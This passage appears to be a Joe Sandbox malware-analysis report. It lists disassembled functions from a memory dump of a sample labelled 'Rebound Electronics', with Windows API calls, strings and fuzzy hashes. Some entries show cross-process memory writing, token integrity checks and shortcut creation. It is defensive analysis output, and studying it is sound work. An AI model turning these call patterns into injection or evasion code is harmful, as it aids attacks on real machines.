ProgIDFromCLSID.OLE32(?,00000000), ref: 00C59AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00C59B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C59B15
CLSIDFromString.OLE32(?,?), ref: 00C59B21

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: f43a99df51c1c954dedbeaa9f600c16ba099aa9ba8b777b00f5d525bea5bff40
Instruction ID: 5bd190e6d03dcaa811b490562ca2d10f3a32bd64d281d41ec25bc8b3bf777a76
Opcode Fuzzy Hash: f43a99df51c1c954dedbeaa9f600c16ba099aa9ba8b777b00f5d525bea5bff40
Instruction Fuzzy Hash: 6E017C7A600204FBEB204F54EC44B9EBBBDEB45756F144064FD06D3260D774DE849BA0

Function 00C67A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C67A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C67A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C67A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C67A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C67AD0

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f03b3b30626bd5f494a61d3492e7bbef48b3dc75d5b85c4f154fc4ec90c2af49
Instruction ID: ba34c305ddeec20e099cda7e2fa1a7b7d57d54cf2847f7b54981893834638b10
Opcode Fuzzy Hash: f03b3b30626bd5f494a61d3492e7bbef48b3dc75d5b85c4f154fc4ec90c2af49
Instruction Fuzzy Hash: C4011732C04619EBCF10AFE5D889BDDBB78FB09719F010A95E502B2251DB3096519BA1

Function 00C5AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C5AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C5AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5AB10

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9763935bacd7655e5625c0913c404c28bce8280a2b3cbca06229e11684719d8a
Instruction ID: f6d8862c57a5c8dad14b5aae340a5d902cf90db579f290161be52db0ef9a037d
Opcode Fuzzy Hash: 9763935bacd7655e5625c0913c404c28bce8280a2b3cbca06229e11684719d8a
Instruction Fuzzy Hash: CEF04F752412086FEB110FA5EC88FAB3B6DFF46759F000129FA53C7190DA6099458BB1

Function 00C5AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C5AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C5AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C5AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C5AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C5AAAF

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a7618942f91f45e53096db590f6410a870aa3483ffe3b93887f647f1ca3a0568
Instruction ID: d0d64c06d0dd565456c0229d0872aa9304a86b619c35a1cfe169b73bb7ad1184
Opcode Fuzzy Hash: a7618942f91f45e53096db590f6410a870aa3483ffe3b93887f647f1ca3a0568
Instruction Fuzzy Hash: E7F0AF752002086FEB101FA5AC88FAB3BACFF4A759F000119FA02C71A0DB609C45DB61

Function 00C5EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C5EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C5ECAB
MessageBeep.USER32(00000000), ref: 00C5ECC3
KillTimer.USER32(?,0000040A), ref: 00C5ECDF
EndDialog.USER32(?,00000001), ref: 00C5ECF9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 853bf8780ace2d12b64fd6ee5b38cf46042a720bbd9bdae532fe6de80d91f3bc
Instruction ID: 0dd89a0b997a5155c939b0b8b56991c32aceda4b3ea60543530b0dd1903ab466
Opcode Fuzzy Hash: 853bf8780ace2d12b64fd6ee5b38cf46042a720bbd9bdae532fe6de80d91f3bc
Instruction Fuzzy Hash: 3F01D6345007149BEB285F10DE4EB9A7778FB0070AF000559B9A3A28E0DBF0BB88CB44

Function 00C3B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00C3B0BA
StrokeAndFillPath.GDI32(?,?,00C9E680,00000000,?,?,?), ref: 00C3B0D6
SelectObject.GDI32(?,00000000), ref: 00C3B0E9
DeleteObject.GDI32 ref: 00C3B0FC
StrokePath.GDI32(?), ref: 00C3B117

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: df92e312e88571fc106a5d803c9de41e3595c22f53ae0fddbeb0677267701e10
Instruction ID: 4f5b623a7bcf7d32e9719fd848cc85d155fef1b4bb20cf9963cdc4ee84d731b5
Opcode Fuzzy Hash: df92e312e88571fc106a5d803c9de41e3595c22f53ae0fddbeb0677267701e10
Instruction Fuzzy Hash: 45F0EC70010284EFDB259F65EC4D79D3F69E711366F088315F96A494F0C7358A66DF50

Function 00C6F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C6F2DA
CoCreateInstance.OLE32(00CADA7C,00000000,00000001,00CAD8EC,?), ref: 00C6F2F2
CoUninitialize.OLE32 ref: 00C6F555

Strings

.lnk, xrefs: 00C6F28B, 00C6F290, 00C6F29E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: d7c337a15f6eccce2a1e03ff16a20d50320a147a19e2f86a33006ae58b05fdb0
Instruction ID: 6d1499fb9ede8a4118931057adf2303bf337c3ea66c5c8ce2faa0e6f697d431e
Opcode Fuzzy Hash: d7c337a15f6eccce2a1e03ff16a20d50320a147a19e2f86a33006ae58b05fdb0
Instruction Fuzzy Hash: 56A11971114301AFD700EF64D881EAFB7A8EF98714F00492DF55697192EB70EA49DBA2

Function 00C6E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C253B1,?,?,00C261FF,?,00000000,00000001,00000000), ref: 00C2662F

CoInitialize.OLE32(00000000), ref: 00C6E85D
CoCreateInstance.OLE32(00CADA7C,00000000,00000001,00CAD8EC,?), ref: 00C6E876
CoUninitialize.OLE32 ref: 00C6E893

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

Strings

.lnk, xrefs: 00C6E83B, 00C6E84D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: f5b6e72ebc518a203b44ecb5faa0694a834ded3bd1d795c1301ef5174bd84b8d
Instruction ID: 9dc28a1e67cb020071e1651e2837ada42b5bda2609eba2593d72d03f0c0bfd3a
Opcode Fuzzy Hash: f5b6e72ebc518a203b44ecb5faa0694a834ded3bd1d795c1301ef5174bd84b8d
Instruction Fuzzy Hash: 8FA155396043119FCB20DF14C48496EBBE5FF89324F048999F9A69B3A2CB31ED45CB91

Function 00C4325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C432ED

Part of subcall function 00C4E0D0: __87except.LIBCMT ref: 00C4E10B

Strings

pow, xrefs: 00C432C5, 00C432E2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f2d5dd912db373b30b4a84ad14dca9517714f93b97ffd2f37aeea4363c78c945
Instruction ID: 1ce232c86616d8754a203a1d6703d8bd1ac3b36d4f7fb5002d59ea6c15d4b83f
Opcode Fuzzy Hash: f2d5dd912db373b30b4a84ad14dca9517714f93b97ffd2f37aeea4363c78c945
Instruction Fuzzy Hash: 74513C71E0824296CB257B14C94137E3B94BB80720F358E68F4F6861FADF748F95EA46

Function 00C64606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00CBDC50,?,0000000F,0000000C,00000016,00CBDC50,?), ref: 00C64645

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00C646C5

Strings

THIS, xrefs: 00C64703
REMOVE, xrefs: 00C64676

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 4f2be5a1f9e7a570972e4f7906f261ed0c9817b7732921fc5548ae4143f863ae
Instruction ID: 2ed9e86d8c4f780175b8cbba84ed7e4b5d4bbd5ea8dfb5df917cb5ce193179f2
Opcode Fuzzy Hash: 4f2be5a1f9e7a570972e4f7906f261ed0c9817b7732921fc5548ae4143f863ae
Instruction Fuzzy Hash: C741A174A002199FCF18DF64C8C1AAEB7B4FF49304F048069F926AB6A2DB30DD41DB50

Function 00C5C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C6430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C5BC08,?,?,00000034,00000800,?,00000034), ref: 00C64335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C5C1D3

Part of subcall function 00C642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C5BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00C64300

Part of subcall function 00C6422F: GetWindowThreadProcessId.USER32(?,?), ref: 00C6425A
Part of subcall function 00C6422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C5BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C6426A
Part of subcall function 00C6422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C5BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C64280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C5C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C5C28D

Strings

@, xrefs: 00C5C2A5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 5d2ee4ab8a3bc10f11b9cc1942a5ea15b483c9d274a1362399a73fc39351b16b
Instruction ID: 339f325aba08bdeac300effccc919ff57a9c3e75ed0ccbc49e9a6ad82d1517d4
Opcode Fuzzy Hash: 5d2ee4ab8a3bc10f11b9cc1942a5ea15b483c9d274a1362399a73fc39351b16b
Instruction Fuzzy Hash: F0415976900218BFDB10DFA4CC81AEEB7B8EF09700F104095FA56B7181DA716F89DB61

Function 00C8A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CBDC00,00000000,?,?,?,?), ref: 00C8A6D8
GetWindowLongW.USER32 ref: 00C8A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C8A705

Strings

SysTreeView32, xrefs: 00C8A6AA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2a6e2ea34084f7d74b419c85d5f7b787635906a1ae0be1a29f9b74a9e861565b
Instruction ID: a0083dbbd05f4deceaf481ba997b150f5461f697836efc5ea35769d108490889
Opcode Fuzzy Hash: 2a6e2ea34084f7d74b419c85d5f7b787635906a1ae0be1a29f9b74a9e861565b
Instruction Fuzzy Hash: 4331CF31200606AFEB119F38CC41BEA7BA9FB49328F244726F976932E0D770AD509B54

Function 00C8A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C8A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C8A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C8A196

Strings

SysMonthCal32, xrefs: 00C8A129

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d66a5fe47b52fdddd71563aa43bbfaa947cd63cdecf7441e70d5420376f542eb
Instruction ID: 8540f8880105a5b89cad07d70237c688780953b6f5e202eda8ad168715882be0
Opcode Fuzzy Hash: d66a5fe47b52fdddd71563aa43bbfaa947cd63cdecf7441e70d5420376f542eb
Instruction Fuzzy Hash: AC21BF32510218ABEF119F94CC86FEE3B79EF48718F100215FA566B1D0D6B5AC50DB94

Function 00C8A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C8A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C8A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C8A956

Strings

msctls_updown32, xrefs: 00C8A8BB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 3ccafe703dad5d9bcecc252df58b20410fb357154a57c86dcff7cef086b0cc3a
Instruction ID: 0ad311aaa1ae52e8ae9b9a82175b471d138d8a6d5e95fa23ac230a02b26ff759
Opcode Fuzzy Hash: 3ccafe703dad5d9bcecc252df58b20410fb357154a57c86dcff7cef086b0cc3a
Instruction Fuzzy Hash: 572165B5600209AFEB10DF54DCD1E6B37ADEB5A358B050059FA159B251CB30EC11DB65

Function 00C899A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C89A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C89A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C89A65

Strings

Listbox, xrefs: 00C899FD

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: c999fa1385761729f00b556220217125aacd5b0c8e8b2e387b6ea27c5cc5225c
Instruction ID: a8c95c5340d98eddf879ede1ccfab5043f1b6b89cd559cdb03317a4dd62a84e3
Opcode Fuzzy Hash: c999fa1385761729f00b556220217125aacd5b0c8e8b2e387b6ea27c5cc5225c
Instruction Fuzzy Hash: DE210032210118BFDF259F54CC81FFF3BAAEB8A768F048128F9599B1A0C6719C1197A4

Function 00C8A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C8A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C8A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C8A48F

Strings

msctls_trackbar32, xrefs: 00C8A444

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 83cfd70e05e47b17a00554d8d63206051194409ff9c96d4154d02827523ab0d3
Instruction ID: 891083b61573ee2e6187834f5d07aec449fbbf6c46111c01a8406b3da2ca1a38
Opcode Fuzzy Hash: 83cfd70e05e47b17a00554d8d63206051194409ff9c96d4154d02827523ab0d3
Instruction Fuzzy Hash: B6110A71200208BFEF246F65CC45FAB376DEFC9758F014129FA55A6091D2B1E811D728

Function 00C42287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C42350,?), ref: 00C422A1
GetProcAddress.KERNEL32(00000000), ref: 00C422A8

Strings

combase.dll, xrefs: 00C4229C
RoInitialize, xrefs: 00C42290

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
